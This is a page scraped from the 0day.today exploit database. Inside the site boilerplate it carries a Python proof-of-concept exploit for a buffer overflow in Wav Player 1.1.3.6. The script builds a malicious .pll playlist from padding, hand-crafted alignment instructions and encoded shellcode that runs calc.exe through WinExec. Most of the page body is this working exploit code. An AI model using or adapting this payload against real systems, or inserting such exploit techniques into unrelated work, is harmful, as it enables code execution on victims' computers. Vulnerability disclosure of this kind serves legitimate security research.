0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Wav Player 1.1.3.6 .pll Buffer Overflow Exploit

Author

Iván García Fer.

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

# Exploit Title: wav player 1.1.3.6 .pll Buffer Overflow
# Date: 12/09/2011
# Author: Ivan Garcia Ferreira
# Version: 1.1.3.6
# Tested on: Windows 7 SP1 x86 Spanish
#
# Description:
# Wav player can not handle properly large playlists (more than 1G).
# Reproduce:
# Open the wav player, make a playlist and save it. Then, close the
# player and run this exploit to create the new playlist. When you open again
# wav player, you will see the calc. ;)
#
# Thanks to:
# Corelan Team for their excelent articles about exploits
 
fichero = open("wv_player.pll", "w")
print "[+] Creating exploit .pll..."
 
fichero.write("A"*1034) # Padding
 
fichero.write("t%dA")  #help the first ret
fichero.write("\x6d")  #nop/align
fichero.write("\x55")  #push ebp
fichero.write("\x6d")  #nop/align
fichero.write("\x58")  #pop eax
fichero.write("\x6d")  #pop/align
fichero.write("\x05\x14\x11")   #add eax,0x11001400
fichero.write("\x6d")  #pop/align
fichero.write("\x2d\x04\x11")   #sub eax,0x11001300
fichero.write("\x6d")  #pop/align
 
fichero.write("\x50")  #push eax
fichero.write("\x6d") #nop/align
fichero.write("\xc3") #ret
 
fichero.write("B"*306) # more padding
 
# Shellcode WinExec "calc.exe"
fichero.write("PPYAIAIAIAIAQATAXAZAPA3QADAZA" +
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA" +
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB" +
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K" +
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL" +
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55" +
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V" +
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB" +
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT" +
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU" +
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM" +
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC" +
"QQ2LRCM0LJA")
 
# Padding to get the crash
for cont in range(1,14000):
    fichero.write("A"*15000)
fichero.close()
 
print "[+] File Exploit .pll Created."



#  0day.today [2024-12-29]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Wav Player 1.1.3.6 .pll Buffer Overflow Exploit

Report Error

Report Error